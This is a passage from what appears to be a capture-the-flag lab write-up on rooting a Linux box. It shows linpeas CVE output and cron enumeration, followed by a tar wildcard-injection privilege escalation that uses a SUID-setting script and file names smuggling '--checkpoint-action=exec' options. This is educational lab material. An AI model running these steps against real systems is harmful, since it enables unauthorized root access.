[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-harden...l-exploits
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial ╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-harden...do-version
Sudo version 1.8.16 ╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034 Potentially Vulnerable to CVE-2022-2588 ---abbreviated ---
THE MOST RELEVANT INFO FROM LINPEAS in bold:
VULNERABLE TO CVE-2021-4034
MAYBE CVE-2022-2588 https://github.com/carlospolop/PEASS-ng/...linpeas.sh
[+] [CVE-2017-16995] eBPF_verifier Details: https://ricklarabee.blogspot.com/2018/07...linux.html Exposure: highly probable Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic} Download URL: https://www.exploit-db.com/download/45010 Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
</code></pre>
<h2>FURTHER ENUMERATION</h2>
<p>Let’s probe a bit more into this machine for some of the common Linux privilege escalation pathways.</p>
<p><strong>CHECK CRONJOBS</strong></p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat /etc/crontab</pre>
<p>Output:</p>
<pre class="wp-block-preformatted"><code># m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
</code></pre>
</p>
<p>The first job in the list is set to run every minute and it just executes <code>backup.sh</code>. Let’s find out what that file does.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="461" height="312" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-359.png" alt="" class="wp-image-1097606" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-359.png 461w, https://blog.finxter.com/wp-content/uplo...00x203.png 300w" sizes="(max-width: 461px) 100vw, 461px" /></figure>
</div>
<p>We can see that <code>backup.sh</code> starts a new shell, changes directory to <code>/var/www/html</code> and then creates a tarball file of all the files from <code>/var/www/html</code> and stores it in <code>home/milesdyson/backups/backup.tgz</code></p>
<p>The <code>*</code> is a wildcard symbol that means everything in the current directory. We can exploit this by adding our own files and using file names with unusual extensions to launch a malicious file, <code>magic.sh</code> as part of the automated cronjob that runs <code>backup.sh</code> and creates a tarball every minute of the contents of the directory.</p>
<h2>PLAN AND CARRY OUT PRIVILEGE ESCALATION</h2>
<p>First, we’ll create the <code>magic.sh</code> file that will add a SUID bit to <code>/bin/bash</code>. The next time we spawn a shell after setting up the hack and waiting at least 1 minute, we can use persistence mode (<code>/bin/bash -p</code>) to spawn a root shell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">printf '#!/bin/bash\nchmod +s /bin/bash' > magic.sh</pre>
<p>Next, let’s use echo to create two more files with unusual names that are necessary for the tarball creation process to trigger our <code>magic.sh</code> program and add the SUID bit to <code>/bin/bash</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">echo "/var/www/html" > "--checkpoint-action=exec=sh magic.sh"
echo "/var/www/html" > --checkpoint=1</pre>
</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="769" height="450" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-360.png" alt="" class="wp-image-1097607" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-360.png 769w, https://blog.finxter.com/wp-content/uplo...00x176.png 300w" sizes="(max-width: 769px) 100vw, 769px" /></figure>
</div>
<h2>USER FLAG</h2>
<p>Let’s grab the root flag from <code>/home/milesdyson</code></p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">$ cat user.txt
7c—-omitted—----07</pre>
</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="458" height="450" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-361.png" alt="" class="wp-image-1097608" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-361.png 458w, https://blog.finxter.com/wp-content/uplo...00x295.png 300w" sizes="(max-width: 458px) 100vw, 458px" /></figure>
</div>
<h2>ROOT FLAG</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat /root/root.txt
3f—-omitted—----49</pre>
</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="771" height="209" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-362.png" alt="" class="wp-image-1097609" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-362.png 771w, https://blog.finxter.com/wp-content/uplo...300x81.png 300w, https://blog.finxter.com/wp-content/uplo...68x208.png 768w" sizes="(max-width: 771px) 100vw, 771px" /></figure>
</div>
<h2>TAKE-AWAYS</h2>
<p><strong>Takeaway #1 – </strong>The simpler solution is usually the better solution. <code>- I</code> wasted a lot of time trying to get Metasploit to catch the reverse shell and start a meterpreter session. </p>
<p>In the end, I learned I had overlooked setting the payload on <code>msfconsole</code> listener (exploit(multi/handler)) to match that of my reverse shell payload. </p>
<p>It’s not listed when you search “options”, but it is still necessary to set it to be able to properly catch the shell and start a meterpreter session. I used a basic shell session to root the box, and all of that precious time spent on metasploit didn’t help us get root access.</p>
<p><strong>Takeaway #2 – </strong>Remote file inclusion vulnerabilities allow threat actors to carry out arbitrary code execution. In practice, this means that your machine can be quickly compromised, all the way down to the root user.</p>
</div>
https://www.sickgaming.net/blog/2023/01/...inclusion/